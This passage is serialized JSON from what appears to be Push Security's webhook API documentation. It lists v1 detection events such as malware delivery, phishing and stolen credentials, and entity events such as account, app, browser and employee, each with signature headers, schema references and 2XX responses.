Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_761"}},"schemaId":"schema_761","pointer":"/paths/malware-delivery-detection/post/requestBody","description":"A malware delivery detection occurred."}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"malware-delivery-detection","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_761"}},"responseCodes":["2XX"],"pointer":"malware-delivery-detection","href":"detections/malware-delivery-detection-event","openApiOperationId":"malware-delivery-detection-event","summary":"Malware delivery detection"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_761","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_761"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/malware-delivery-detection/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/detections/malware-delivery-detection-event"}],"panels":[]}]},"httpPath":"malware-delivery-detection"},{"label":"Phishing attack detection","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/detections/phishing-detection-event","routeSlug":"/webhooks-v1/detections/phishing-detection-event","metadata":{"seo":{"title":"Phishing attack detection","description":"Phishing attack detection"}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"phishing-detection-event","name":"Phishing attack detection","isWebhook":true,"pointer":"/paths/phishing-attack-detection/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Phishing attack detection","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/phishing-attack-detection/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_762"}},"schemaId":"schema_762","pointer":"/paths/phishing-attack-detection/post/requestBody","description":"A phishing attack detection occurred."}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"phishing-attack-detection","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_762"}},"responseCodes":["2XX"],"pointer":"phishing-attack-detection","href":"detections/phishing-detection-event","openApiOperationId":"phishing-detection-event","summary":"Phishing attack detection"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_762","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_762"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/phishing-attack-detection/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/detections/phishing-detection-event"}],"panels":[]}]},"httpPath":"phishing-attack-detection"},{"label":"Stolen credentials detection","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/detections/stolen-credentials-detection-event","routeSlug":"/webhooks-v1/detections/stolen-credentials-detection-event","metadata":{"seo":{"title":"Stolen credentials detection","description":"Stolen credentials detection"}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"stolen-credentials-detection-event","name":"Stolen credentials detection","isWebhook":true,"pointer":"/paths/stolen-credentials-detection/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Stolen credentials detection","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/stolen-credentials-detection/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_763"}},"schemaId":"schema_763","pointer":"/paths/stolen-credentials-detection/post/requestBody","description":"A stolen credentials detection occurred."}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"stolen-credentials-detection","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_763"}},"responseCodes":["2XX"],"pointer":"stolen-credentials-detection","href":"detections/stolen-credentials-detection-event","openApiOperationId":"stolen-credentials-detection-event","summary":"Stolen credentials detection"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_763","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_763"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/stolen-credentials-detection/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/detections/stolen-credentials-detection-event"}],"panels":[]}]},"httpPath":"stolen-credentials-detection"}],"content":{"contentType":"group","meta":{"name":"Detections"},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Detections","showPageActions":true}],"panels":[{"children":[{"kind":"group-items","title":"Webhooks","titleTranslationKey":"webhooks","items":[{"title":"blocked-url-detection","summary":"Blocked URL detection","prefix":{"name":"post","color":"post"},"badges":[],"link":"/detections/blocked-url-detection-event","deprecated":false},{"title":"custom-detection","summary":"Custom detection","prefix":{"name":"post","color":"post"},"badges":[],"link":"/detections/custom-detection-event","deprecated":false},{"title":"malicious-browser-extension-detection","summary":"Malicious browser extension detection","prefix":{"name":"post","color":"post"},"badges":[],"link":"/detections/malicious-browser-extension-detection-event","deprecated":false},{"title":"malware-delivery-detection","summary":"Malware delivery detection","prefix":{"name":"post","color":"post"},"badges":[],"link":"/detections/malware-delivery-detection-event","deprecated":false},{"title":"phishing-attack-detection","summary":"Phishing attack detection","prefix":{"name":"post","color":"post"},"badges":[],"link":"/detections/phishing-detection-event","deprecated":false},{"title":"stolen-credentials-detection","summary":"Stolen credentials detection","prefix":{"name":"post","color":"post"},"badges":[],"link":"/detections/stolen-credentials-detection-event","deprecated":false}]}]}]}]}},{"type":"group","label":"Entities","link":"/webhooks-v1/entities","routeSlug":"/webhooks-v1/entities","items":[{"label":"Account","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/entities/account-event","routeSlug":"/webhooks-v1/entities/account-event","metadata":{"seo":{"title":"Account","description":"Account"}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"account-event","name":"Account","isWebhook":true,"pointer":"/paths/account/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Account","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/account/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_764"}},"schemaId":"schema_764","pointer":"/paths/account/post/requestBody","description":"An account was created, updated or deleted."}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"account","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_764"}},"responseCodes":["2XX"],"pointer":"account","href":"entities/account-event","openApiOperationId":"account-event","summary":"Account"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_764","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_764"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/account/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/entities/account-event"}],"panels":[]}]},"httpPath":"account"},{"label":"Account (Other)","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/entities/account-other-event","routeSlug":"/webhooks-v1/entities/account-other-event","metadata":{"seo":{"title":"Account (Other)","description":"Account (Other)"}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"account-other-event","name":"Account (Other)","isWebhook":true,"pointer":"/paths/accounts_other/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Account (Other)","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/accounts_other/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_765"}},"schemaId":"schema_765","pointer":"/paths/accounts_other/post/requestBody","description":"An account (Other) was created, updated or deleted."}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"accounts_other","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_765"}},"responseCodes":["2XX"],"pointer":"accounts_other","href":"entities/account-other-event","openApiOperationId":"account-other-event","summary":"Account (Other)"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_765","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_765"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/accounts_other/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/entities/account-other-event"}],"panels":[]}]},"httpPath":"accounts_other"},{"label":"App","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/entities/app-event","routeSlug":"/webhooks-v1/entities/app-event","metadata":{"seo":{"title":"App","description":"App"}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"app-event","name":"App","isWebhook":true,"pointer":"/paths/app/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"App","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/app/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_766"}},"schemaId":"schema_766","pointer":"/paths/app/post/requestBody","description":"An app was created, updated or deleted."}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"app","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_766"}},"responseCodes":["2XX"],"pointer":"app","href":"entities/app-event","openApiOperationId":"app-event","summary":"App"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_766","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_766"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/app/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/entities/app-event"}],"panels":[]}]},"httpPath":"app"},{"label":"App (Other)","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/entities/app-other-event","routeSlug":"/webhooks-v1/entities/app-other-event","metadata":{"seo":{"title":"App (Other)","description":"App (Other)"}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"app-other-event","name":"App (Other)","isWebhook":true,"pointer":"/paths/apps_other/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"App (Other)","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/apps_other/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_767"}},"schemaId":"schema_767","pointer":"/paths/apps_other/post/requestBody","description":"An app (Other) was created, updated or deleted."}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"apps_other","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_767"}},"responseCodes":["2XX"],"pointer":"apps_other","href":"entities/app-other-event","openApiOperationId":"app-other-event","summary":"App (Other)"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_767","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_767"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/apps_other/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/entities/app-other-event"}],"panels":[]}]},"httpPath":"apps_other"},{"label":"Browser","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/entities/browser-event","routeSlug":"/webhooks-v1/entities/browser-event","metadata":{"seo":{"title":"Browser","description":"Browser"}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"browser-event","name":"Browser","isWebhook":true,"pointer":"/paths/browser/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Browser","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/browser/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_768"}},"schemaId":"schema_768","pointer":"/paths/browser/post/requestBody","description":"An employee browser was created, updated or deleted."}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"browser","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_768"}},"responseCodes":["2XX"],"pointer":"browser","href":"entities/browser-event","openApiOperationId":"browser-event","summary":"Browser"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_768","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_768"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/browser/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/entities/browser-event"}],"panels":[]}]},"httpPath":"browser"},{"label":"Browser Extension","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/entities/browser-extension-event","routeSlug":"/webhooks-v1/entities/browser-extension-event","metadata":{"seo":{"title":"Browser Extension","description":"Browser Extension"}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"browser-extension-event","name":"Browser Extension","isWebhook":true,"pointer":"/paths/browser-extension/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Browser Extension","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/browser-extension/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_769"}},"schemaId":"schema_769","pointer":"/paths/browser-extension/post/requestBody","description":"An employee browser extension was created, updated or deleted."}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"browser-extension","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_769"}},"responseCodes":["2XX"],"pointer":"browser-extension","href":"entities/browser-extension-event","openApiOperationId":"browser-extension-event","summary":"Browser Extension"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_769","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_769"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/browser-extension/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/entities/browser-extension-event"}],"panels":[]}]},"httpPath":"browser-extension"},{"label":"Employee","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/entities/employee-event","routeSlug":"/webhooks-v1/entities/employee-event","metadata":{"seo":{"title":"Employee","description":"Employee"}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"employee-event","name":"Employee","isWebhook":true,"pointer":"/paths/employee/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Employee","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/employee/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_770"}},"schemaId":"schema_770","pointer":"/paths/employee/post/requestBody","description":"An employee was created, updated or deleted."}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"employee","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_770"}},"responseCodes":["2XX"],"pointer":"employee","href":"entities/employee-event","openApiOperationId":"employee-event","summary":"Employee"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_770","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_770"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/employee/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/entities/employee-event"}],"panels":[]}]},"httpPath":"employee"},{"label":"Finding","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/entities/finding-event","routeSlug":"/webhooks-v1/entities/finding-event","metadata":{"seo":{"title":"Finding","description":"Finding"}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"finding-event","name":"Finding","isWebhook":true,"pointer":"/paths/finding/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Finding","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/finding/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_771"}},"schemaId":"schema_771","pointer":"/paths/finding/post/requestBody","description":"A finding was created, updated or deleted."}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"finding","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_771"}},"responseCodes":["2XX"],"pointer":"finding","href":"entities/finding-event","openApiOperationId":"finding-event","summary":"Finding"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_771","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_771"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/finding/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/entities/finding-event"}],"panels":[]}]},"httpPath":"finding"}],"content":{"contentType":"group","meta":{"name":"Entities"},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Entities","showPageActions":true},{"nodeType":"markdoc","content":"Events representing CRUD operations on entities."}],"panels":[{"children":[{"kind":"group-items","title":"Webhooks","titleTranslationKey":"webhooks","items":[{"title":"account","summary":"Account","prefix":{"name":"post","color":"post"},"badges":[],"link":"/entities/account-event","deprecated":false},{"title":"accounts_other","summary":"Account (Other)","prefix":{"name":"post","color":"post"},"badges":[],"link":"/entities/account-other-event","deprecated":false},{"title":"app","summary":"App","prefix":{"name":"post","color":"post"},"badges":[],"link":"/entities/app-event","deprecated":false},{"title":"apps_other","summary":"App 